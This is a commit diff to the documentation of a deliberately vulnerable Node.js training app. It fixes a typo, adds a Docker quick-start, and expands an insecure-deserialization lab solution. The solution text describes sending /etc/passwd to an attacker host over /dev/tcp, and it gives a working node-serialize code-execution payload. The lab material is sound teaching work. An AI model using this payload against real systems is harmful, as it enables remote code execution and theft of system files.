Updated docs

ho823 · Oct 9, 2018 · ef9e9cc · ef9e9cc
1 parent 7f2adc3
commit ef9e9cc
Show file tree

Hide file tree

Showing 3 changed files with 23 additions and 1 deletion.
diff --git a/docs/SUMMARY.md b/docs/SUMMARY.md
@@ -16,7 +16,7 @@
 * [A5 Broken Access Control](solution/a5-broken-access-control.md)
 * [A6 Security Misconfiguration](solution/a6-securty-misconfig.md)
 * [A7 Cross-site Scripting](solution/a7-xss.md)
-* [A8 Insecure Deseriliaztion](solution/a8-insecure-deserialization.md)
+* [A8 Insecure Deserialization](solution/a8-insecure-deserialization.md)
 * [A9 Using Components with Known Vulnerability](solution/a9-using-components-with-known-vulnerability.md)
 * [A10 Insufficient Logging and Monitoring](solution/a10-insufficient-logging.md)
 

diff --git a/docs/setup.md b/docs/setup.md
@@ -18,6 +18,16 @@ Setup Without Docker:
 - NodeJS (Developed using NodeJS v6.11.4)
 - MySQL Server (Developed using MySQL 5.7)
 
+### Quick start
+
+On a system with Docker installed, run
+
+```bash
+docker run --name dvna -p 9090:9090 -d appsecco/dvna:sqlite
+```
+
+Access the application at http://127.0.0.1:9090
+
 ### Development Setup
 
 If you do not have Docker and Docker Compose setup, then

diff --git a/docs/solution/a8-insecure-deserialization.md b/docs/solution/a8-insecure-deserialization.md
@@ -4,12 +4,24 @@ The `Legacy Bulk Import` feature at http://127.0.0.1:9090/app/bulkproducts?legac
 
 ![jse1](/resources/jse1.png)
 
+To execute code we need to provide a serialized object to the server. The object (as shown below) in this case would be a function that uses the `child_process` library to invoke `bash -c -- \"cat /etc/passwd > /dev/tcp/attacker-ip/nc-port\"`. The function is made into an [Immediately Invoked function Expression (IIFE)](https://en.wikipedia.org/wiki/Immediately-invoked_function_expression) by adding `()` to the end of the function
+
 The following input will trigger the vulnerability
 
 ```
 {"rce":"_$$ND_FUNC$$_function (){require('child_process').exec('id;cat /etc/passwd', function(error, stdout, stderr) { console.log(stdout) });}()"}
 ```
 
+which is the serialized version of
+
+```
+var y = {
+ rce : function(){
+ require('child_process').exec('id;cat /etc/passwd', function(error, stdout, stderr) { console.log(stdout) });
+ }(),
+}
+```
+
 ![jse2](/resources/jse2.png)
 
 **Vulnerable Code snippet**